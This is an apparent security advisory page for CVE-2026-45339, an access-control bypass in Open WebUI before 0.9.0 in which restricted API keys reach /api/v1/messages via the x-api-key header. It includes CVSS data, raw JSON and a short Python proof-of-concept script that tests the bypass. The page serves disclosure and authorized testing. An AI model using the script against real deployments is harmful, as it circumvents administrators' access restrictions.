Security Vulnerability Report
δΈ­ζ–‡
CVE-2026-45339 CVSS 6.5 MEDIUM

CVE-2026-45339

Published: 2026-05-15 20:16:49
Last Modified: 2026-05-15 20:16:49
Source: [email protected]

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, Open WebUI allows admins to restrict which API endpoints an API key can access. When an API key is restricted from /api/v1/messages, requests using the Authorization: Bearer sk-... header are correctly blocked with 403. However, the same key sent via the x-api-key header bypasses the restriction entirely β€” the request is authenticated, the model is invoked, and a full response is returned. This vulnerability is fixed in 0.9.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def verify_vulnerability(target_url, api_key): """ This script verifies the access control bypass vulnerability in Open WebUI. It attempts to access a restricted endpoint using the x-api-key header. """ restricted_endpoint = f"{target_url}/api/v1/messages" # Payload for the API request payload = { "model": "default-model", "messages": [{"role": "user", "content": "test"}] } # Headers to test bypass headers = { "Content-Type": "application/json", "x-api-key": api_key # Vulnerable header } try: response = requests.post(restricted_endpoint, json=payload, headers=headers, timeout=5) if response.status_code == 200: print("[+] Vulnerability Confirmed: Request bypassed restriction.") print(f"[+] Response: {response.text}") elif response.status_code == 403: print("[-] Access Denied: Restriction is working correctly.") else: print(f"[?] Unexpected status code: {response.status_code}") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": # Example usage target = "http://localhost:3000" key = "sk-restricted-key-example" verify_vulnerability(target, key)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45339", "sourceIdentifier": "[email protected]", "published": "2026-05-15T20:16:48.693", "lastModified": "2026-05-15T20:16:48.693", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, Open WebUI allows admins to restrict which API endpoints an API key can access. When an API key is restricted from /api/v1/messages, requests using the Authorization: Bearer sk-... header are correctly blocked with 403. However, the same key sent via the x-api-key header bypasses the restriction entirely β€” the request is authenticated, the model is invoked, and a full response is returned. This vulnerability is fixed in 0.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-57q6-fvp4-pqmm", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.